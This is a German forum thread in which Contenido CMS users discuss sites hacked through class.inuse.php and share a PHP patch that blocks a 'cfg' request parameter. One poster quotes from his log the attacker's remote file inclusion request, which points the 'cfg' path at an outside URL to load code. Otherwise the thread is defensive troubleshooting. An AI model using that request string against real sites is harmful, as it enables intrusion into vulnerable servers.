Contenido gehackt - Update schlägt fehl - Was nun?

[Halchteranerin]

War ein Scherz, war eine zu schöne Vorlage, um sie ungenutzt liegen zu lassen...

Das war auch nicht die Antwort auf josts Frage sondern die Erfuellung deines Wunsches.
Aber danke fuers Aufwecken. Eigentlich habe ich faul darauf gewartet, dass timo eine neue (Unter-)Version veroeffentlicht, und die Sache komplett vergessen. Jetzt habe ich aber endlich die Dateien geaendert.

[goach]

Also, soweit ich das gesehen habe und beurteilen kann, da meine PHP Kenntnisse auch nicht so der Wahnsinn sind, hat Timo folgenden Code an den Anfang der class.inuse.php eingesetzt und zwar vor die require_once Anweisung:

Code: Alles auswählen

if ($_GET["cfg"] || $_POST["cfg"])
{
	die();
}

Noch eine Anmerkung: der Patch muss auch das $_COOKIE array berücksichtigen mit z.B.

Code: Alles auswählen

if ($_REQUEST["cfg"] )
{
	die();
}

Ist auch speicherplatzschonender Siehe auch http://contenido.org/forum/viewtopic.php?p=66712#66712
Gerhard

[Simone]

Meine Website wurde auch gehackt, und habe jetzt - nach der Reparatur - den Code

Code: Alles auswählen

if ($_GET["cfg"] || $_POST["cfg"])
{
   die();
} 

in die "class.inuse.php eingesetzt und zwar vor die require_once Anweisung", wie beschrieben. Mit dem zweiten Teil "Noch eine Anmerkung: der Patch muss auch das $_COOKIE array berücksichtigen" weiß ich leider nichts anzufangen.

PS: Ich habe übrigens 4.6.2. Ich hoffe, die Codeänderung ist da auch notwendig (hab ein wenig den Eindruck, daß hier eher 4.4.4 gemeint ist).

Für jede Aufklärung unendlich dankbar,


Simone

[goach]

Liebe Simone, Dein Code fängt nur $_POST und $_GET Variablen ab, man kann aber leider auch über Cookievariablen Code einschleusen => daher unbedingt gleich $_REQUEST verwenden (ersetzt $_POST und $_GET plus $_COOKIE). Leider ist die class.inuse.php nicht die einzige anfällige Klasse (siehe http://contenido.org/forum/viewtopic.php?p=66712#66712), das gilt alles auch für die aktuelle Version 4.6.4 (!)

[Simone]

Ich danke Dir, goach!

Ich habe alle Änderungen von Beleuchtfix ausgeführt und hoffe, das wars (bis zum nächsten Leck )

Simone

[DoroM]

eine meiner Seiten wurde auch gehackt, zumindest ist die front_content.php nicht mehr zu sehen.
Folgemde Fehlermeldung:
[16-Jan-2006 11:56:35] PHP Warning: main(/home/www/web227/html/contenido/classes/class.inuse.php): failed to open stream: Permission denied in /home/www/web227/html/conlib/local.php on line 12
[16-Jan-2006 11:56:35] PHP Warning: main(): Failed opening '/home/www/web227/html/contenido/classes/class.inuse.php' for inclusion (include_path='.') in /home/www/web227/html/conlib/local.php on line 12
[16-Jan-2006 11:56:35] PHP Fatal error: Class article: Cannot inherit from undefined class item in home/www/web227/html/contenido/classes/class.article.php on line 102

Ich habe die Änderungen durchgeführt, aber es geht immer noch nix. Muss die SEite ganz neu aufgebaut werden?

Gruß
DoroM

[Halchteranerin]

DoroM, Version 4.6 oder 4.4?

[DoroM]

Version 4.4.
Übrigens geht jetzt alles wieder. Ich habe die gefixte Version der class.inuse.php drübergebügelt und die Rechte gesetzt. Jetzt ist die Seite wieder da. Leider weiß ich jetzt gar nicht genau, was die Ursache war für das Verschwinden, evtl. waren nur die Rechte verstellt, (Schääm), aber wie kommt das?

Gruß
DoroM

[Halchteranerin]

Du hast bei Version 4.6 gepostet! Guck bei Version 4.4, da hat Beleuchtfix ein Paket mit mehreren Dateien bereitgestellt, die man ALLE ueberschreiben sollte. Sicher ist sicher!

[Dennis]

eine frage. Ich habe version 4.4.4 und kann aus bestimmten gründen nicht updaten. Wenn ich jetzt das hier:

Code: Alles auswählen

if ($_GET["cfg"] || $_POST["cfg"])
{
	die();
}
if ($_REQUEST["cfg"] )
{
	die();
}

in jede .php Datei einfüge wo die cfg variablen benutzt werden. Kann es dann zu fehlern kommen? Weil damit würde ich ja verhindern das der exploit noch irgendwo verwendet werden kann.

[goach]

Kann es dann zu fehlern kommen? Weil damit würde ich ja verhindern das der exploit noch irgendwo verwendet werden kann.

Den Code in jede Datei einzubauen ist sicher etwas zu viel des Guten, das Problem sind jene Files, die include, require etc. mit der $cfg verwenden, z.B. die class.inuse.php der Version 4.4.4 ist hier einladend offen zum "hacken". Ohne das System in den Tiefen zu kennen, würd ich mal behaupten, dass der Einbau gefahrlos ist weil es relativ sinnlos wäre die $cfg über GET/POST zu verwenden (ist ja ein internes Konfigurationsarray)

[Dennis]

ich frage weil ich festgestellt habe das fast überall diese cfg variablen benutzt werden.

das wird ein spaß alle dateien zu ändern wo das drin ist.

[Dennis]

habe in meiner logfile gefunden wie er das gemacht hat:

domain.de/contenido/classes/class.inuse.php?cfg[path][contenido]=http://geocities.yahoo.com.br/forkftp/g ... 0chase.zip

so hat er das ganze aufgerufen. jetzt geht das bei natürlich nicht mehr.

Habe die hoster jetzt auch verständigt das sie phishing content hosten.


weiß jemand aus welchem land die domainendung .ro ist?

[Halchteranerin]

weiß jemand aus welchem land die domainendung .ro ist?

Rumaenien.

[Dennis]

die gehen richtig ab. hab schon mehr als 5 verschiedene standorte wo leute versucht haben so scripte auf unserem server laufen zu lassen.

meisten ist in einer bild datei oder einer .txt ein phpscript versteckt das ein exploit beinhaltet.